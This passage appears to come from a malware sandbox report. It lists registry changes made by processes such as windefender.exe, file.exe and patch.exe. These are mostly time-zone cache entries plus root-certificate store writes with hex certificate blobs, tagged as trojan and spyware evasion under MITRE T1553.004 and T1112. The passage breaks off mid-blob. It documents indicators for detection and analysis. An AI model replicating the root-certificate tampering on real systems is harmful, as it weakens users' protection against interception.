Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-102 = "Microsoft Corporation"	DllHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-100 = "RD Gateway Quarantine Enforcement Client"	DllHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-602 = "Taipei Standard Time"	windefender.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	DllHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1471 = "Magadan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-212 = "Pacific Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-581 = "North Asia East Daylight Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-385 = "Namibia Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-232 = "Hawaiian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-661 = "Cen. Australia Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-671 = "AUS Eastern Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	DllHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-191 = "Mountain Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time"	schtasks.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	schtasks.exe

Modifies system certificate store 2 TTPs 15 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	file.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb